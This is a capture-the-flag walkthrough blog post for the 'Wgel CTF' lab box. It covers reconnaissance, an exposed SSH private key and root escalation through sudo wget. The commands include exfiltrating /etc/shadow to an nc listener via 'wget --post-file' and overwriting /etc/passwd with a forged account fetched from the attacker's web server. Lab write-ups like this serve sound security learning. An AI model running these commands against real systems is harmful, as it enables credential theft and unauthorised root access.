Wgel CTF
Wgel CTF
In this episode we shall be looking at a rather odd box, which uses a novelty of wget
to briefly get root level access. Now without further ado, let's get started.
After running the standard nmap -sC -sV *ip*
we see that there is a web server running and an ssh port open:
Poking around the site a little bit we find a crucial comment. Now this will probably link to one of the corporate accounts, and so we can start running hydra to crack the password, using the good ol' rockyou
wordlist. In the meantime, we can also run dirbuster
as I'm hoping to find some sort of development directory. Because we saw the Apache default page it makes me think there is some kind of template, or website in development.
Running dirbuster
initially gave me a lot of results whenever it used the sitemap
keyword:
Now this is good, but we're wasting a lot of time searching outside of sitemap when it is evident that is all we should be looking through, so let's be more specific and tweak our target URL slightly. Now it was at this stage where I wasn't really getting anything besides the files I had already seen, which means one of two things: That's all there is , or you need a different wordlist. I tried the usr/share/wordlists/dirb/common/.txt
which seems to be a bit better than the ones in /dirbuster/...
as it included the .ssh
entry , whereas the others looked for the /ssh
folder, which is much rarer of course... Really it all depends on the site itself but doing more and more machines I find the former to be best.
I quite like the GUI as I can pause, enter in the Dir to start with
, enter sitemap and it churns through there. But I only found .ssh
after switching to this wordlist :/
We can also see a .ssh/id_rsa
file , and putting two and two together I think we know how to make use of this one...
Download the key and remember to change the permissions to 600
or 400
and you will be granted with the above.
Now then ! Time to achieve root access. This is much trickier, so I employed the help of some enumeration scripts, namely linpeas.sh
. I can transfer this file over to the victim machine by first hosting it on my own web server with python:
;; I made a directory to serve linpeas.sh in , but you don't have to
alex@alex:~$ cd linpeas
alex@alex:~/linpeas$ ls
linpeas.sh
alex@alex:~/linpeas$ python3 -m http.server
;; remember you're using the Public IP of the VPN, so it will be *that* address.
;; you can see the address the VPN is using by typing: ifconfig , and it's under tun0
;; tun0 is for tunneling software, like VPNs, so it makes sense
;; see here : https://unix.stackexchange.com/questions/82673/what-is-the-tun-network-interface-for
And on the victim machine:
Now set it to an executable and it runs through a lot of information, looking through every directory and every possible entry point - checking versions , misconfigurations, any writable directories etc.
Even with this plethora of information, none of it looked particularly convincing. I wasn't seeing a way to break in until I stumbled across this :
So we can run wget
as root. Interesting , and I'm guessing this is the tiny flaw in an otherwise strong system that we have to leverage. After looking around for ways to utilise this tool for exploitation I found that I could run this:
;; wget can send files over, and see we have root , no-password needed access then we
;; can send anything ! So I just sent the shadow file over initially lol
sudo /usr/bin/wget --post-file=/etc/shadow
;; on my machine I need to listen for it
nc -lvp 1234 > shadow-file.txt
The only problem with this is that Jessie has a SHA512 hash ... Good luck cracking that and in fact I couldn't. Now that I have this superpower to pull any file I wanted I googled where accounts and passwords were kept - leading me to this article.
/etc/passwd
this is what stores user accounts. Funnily enough I have read access to the file already, so I can see who's who. Nobody else worth cracking though sadly, what the only left to do is bring the file over and make my own account, then send it back but in the same directory so it would automatically overwrite it. Perfect.
Now I need to make an account that will be recognised and add a password.
;; can make a password which is suitable for /etc/passwd by doing:
openssl passwd -1 -salt alex
;; -1 is the encryption algorithm you want. Type help instead to see all options
The second-to-last entry is mine all ready to go
;; on my machine
mkdir password; mv passwd password; cd password; python3 -m http.server
;; on the victim
cd /etc/; sudo /usr/bin/wget -O passwd 10.8.32.241:8000/passwd
;; so important to include the -O otherwise it won't override the specified file
Now I was hoping to just change the user with su alex
and enter the password but I kept getting errors. The way I resolved this was just to set the password I generated as Jessie's password, and I was then able to get sudo
privileges, and I sneakily did sudo cat /root/root_flag.txt
.
Welp, there we go , I hope you enjoyed.